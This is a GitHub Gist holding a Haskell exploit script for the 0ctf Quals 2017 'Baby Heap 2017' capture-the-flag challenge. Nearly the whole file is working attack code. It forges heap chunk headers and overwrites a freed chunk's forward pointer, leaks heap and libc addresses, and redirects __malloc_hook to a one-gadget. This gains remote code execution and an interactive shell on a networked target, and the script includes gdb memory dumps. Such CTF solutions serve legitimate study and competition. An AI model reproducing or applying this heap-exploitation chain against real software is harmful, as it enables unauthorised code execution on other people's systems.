Created
September 1, 2017 16:49
-
-
Save Tosainu/a2f4bd7b2cc267375f108c386c54438c to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env stack | |
-- stack --stack-yaml ./stack.yaml runghc --package pwn | |
-- 0ctf Quals 2017: Baby Heap 2017 | |
-- https://github.com/ctfs/write-ups-2017/tree/master/0ctf-quals-2017/pwn/Baby-Heap-2017-255 | |
{-# LANGUAGE OverloadedStrings #-} | |
import Control.Monad | |
import Data.Bits | |
import qualified Data.ByteString.Char8 as BS | |
import Data.Maybe | |
import Data.Monoid ((<>)) | |
import Numeric (showHex) | |
-- https://github.com/Tosainu/pwn.hs | |
import Pwn | |
showByteString :: (Show a) => a -> BS.ByteString | |
showByteString = BS.pack . show | |
main :: IO () | |
main = do | |
-- r <- process "./babyheap-patched" [] | |
r <- remote "192.168.122.10" 4000 | |
let libc_main_arena' = 0x3a5620 | |
libc_one_gadget' = 0x41374 | |
allocate size = do | |
allocate' size | |
recvuntil r "Allocate Index " | |
fmap (fst . fromJust . BS.readInt) (recvline r) | |
allocate' size = do | |
recvuntil r "Command: " | |
sendline r "1" | |
recvuntil r "Size: " | |
sendline r $ showByteString size | |
fill idx str = do | |
recvuntil r "Command: " | |
sendline r "2" | |
recvuntil r "Index: " | |
sendline r $ showByteString idx | |
recvuntil r "Size: " | |
sendline r $ showByteString $ BS.length str | |
recvuntil r "Content: " | |
send r str | |
free idx = do | |
recvuntil r "Command: " | |
sendline r "3" | |
recvuntil r "Index: " | |
sendline r $ showByteString idx | |
dump idx = do | |
recvuntil r "Command: " | |
sendline r "4" | |
recvuntil r "Index: " | |
sendline r $ showByteString idx | |
recvuntil r "Content: \n" | |
buf <- recvuntil r "\n1. Allocate" | |
return $ BS.take (BS.length buf - BS.length "\n1. Allocate") buf | |
exit = do | |
recvuntil r "Command: " | |
sendline r "5" | |
info "allocate 0x40 bytes buffer" | |
allocate 0x40 >>= success . (" index: "<>) . show -- 0 | |
info "allocate 0x80 bytes buffer" | |
allocate 0x80 >>= success . (" index: "<>) . show -- 1 | |
info "allocate 0x40 bytes buffer" | |
allocate 0x40 >>= success . (" index: "<>) . show -- 2 | |
info "allocate 0x80 bytes buffer" | |
allocate 0x80 >>= success . (" index: "<>) . show -- 3 | |
info "allocate 0x10 bytes buffer" | |
allocate 0x10 >>= success . (" index: "<>) . show -- 4 | |
info "write fake chunk header via buffer0" | |
let buf = BS.concat $ catMaybes | |
[ Just $ BS.replicate 0x30 'A' | |
, Just $ BS.replicate 0x08 '\x00' -- chunk_prev_size | |
, p64 0x51 -- chunk_size | |
] | |
fill 0 buf | |
info "free buffer0 and buffer2" | |
mapM_ free [0, 2] | |
info "partially overwrite chunk2's fd via buffer1" | |
let buf = BS.concat $ catMaybes | |
[ Just $ BS.replicate 0x80 'A' | |
, Just $ BS.replicate 0x08 '\x00' -- chunk_prev_size | |
, p64 0x51 -- chunk_size | |
, Just "\x40" | |
] | |
fill 1 buf | |
info "allocate 0x40 bytes buffer x2" | |
replicateM 2 (allocate 0x40) >>= success . (" index: "<>) . show -- [0, 2] | |
info "restore chunk1 header via buffer2" | |
let buf = BS.concat $ catMaybes | |
[ Just $ BS.replicate 0x08 '\x00' -- chunk_prev_size | |
, p64 0x91 -- chunk_size | |
] | |
fill 2 buf | |
info "free buffer1 and buffer3" | |
mapM_ free [1, 3] | |
info "leak informations via buffer2" | |
leak <- dump 2 | |
let leak' = BS.drop 0x10 leak | |
(fd, leak'') = BS.splitAt 0x08 leak' | |
(bk, _) = BS.splitAt 0x08 leak'' | |
heap_base = fromJust (u64 bk) - 0x130 | |
main_arena = fromJust (u64 fd) - 88 | |
libc_base = main_arena - libc_main_arena' | |
success $ " heap_base: 0x" <> showHex heap_base "" | |
success $ " main_arena: 0x" <> showHex main_arena "" | |
success $ " libc_base: 0x" <> showHex libc_base "" | |
info "allocate 0x60 bytes buffer and free it" | |
idx <- allocate 0x60 | |
success $ " index: " <> show idx | |
free idx | |
info "overwrite chunk1's fd via buffer2" | |
-- gef> x/40gx 0x7fc475671540 | |
-- 0x7fc475671540 <builtin_modules+576>: 0x7fffffff00000001 0x00007fc47542eea7 | |
-- 0x7fc475671550 <builtin_modules+592>: 0x0000000000000000 0x0000000000000000 | |
-- 0x7fc475671560 <builtin_modules+608>: 0x0000000000000000 0x00007fc47542ee4e | |
-- 0x7fc475671570 <builtin_modules+624>: 0x00007fc47542ee9a 0x7fffffff00000001 | |
-- 0x7fc475671580 <builtin_modules+640>: 0x00007fc47542eebe 0x0000000000000000 | |
-- 0x7fc475671590 <builtin_modules+656>: 0x0000000000000000 0x0000000000000000 | |
-- 0x7fc4756715a0 <locale_alias_path.10282>: 0x00007fc47542f29f 0x00007fc475672c60 | |
-- 0x7fc4756715b0 <__quick_exit_funcs>: 0x00007fc475673080 0x0000000000000000 | |
-- 0x7fc4756715c0 <unsafe_state>: 0x00007fc4756710b0 0x00007fc4756710a4 | |
-- 0x7fc4756715d0 <unsafe_state+16>: 0x00007fc4756710a4 0x0000001f00000003 | |
-- 0x7fc4756715e0 <unsafe_state+32>: 0x0000000000000003 0x00007fc475671120 | |
-- 0x7fc4756715f0 <severity_list>: 0x00007fc47566d940 0x0000000000000000 | |
-- 0x7fc475671600 <__memalign_hook>: 0x00007fc4753493a0 0x00007fc475349340 | |
-- 0x7fc475671610 <__malloc_hook>: 0x0000000000000000 0x0000000000000000 | |
-- 0x7fc475671620 <main_arena>: 0x0000000000000000 0x0000000000000000 | |
-- | |
-- gef> x/40gx 0x7fc475671545 | |
-- 0x7fc475671545 <builtin_modules+581>: 0xc47542eea77fffff 0x000000000000007f <- !! | |
-- 0x7fc475671555 <builtin_modules+597>: 0x0000000000000000 0x0000000000000000 | |
-- 0x7fc475671565 <builtin_modules+613>: 0xc47542ee4e000000 0xc47542ee9a00007f | |
let fake_chunk = main_arena - (0x7fc475671620 - 0x7fc475671545) | |
buf = BS.concat $ catMaybes | |
[ Just $ BS.replicate 0x08 '\x00' -- chunk_prev_size | |
, p64 0x71 -- chunk_size | |
, p64 fake_chunk -- fd | |
] | |
fill 2 buf | |
info "allocate 0x60 bytes buffer x2" | |
replicateM 2 (allocate 0x60) >>= success . (" index: "<>) . show -- [1, 3] | |
info "overwrite __malloc_hook to one-gadget-RCE via buffer3" | |
let buf = BS.concat $ catMaybes | |
[ Just $ BS.replicate (0x7fc475671610 - 0x7fc475671555) 'A' | |
, p64 $ libc_base + libc_one_gadget' | |
] | |
fill 3 buf | |
info "trigger __malloc_hook" | |
allocate' 0x10 | |
interactive r |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment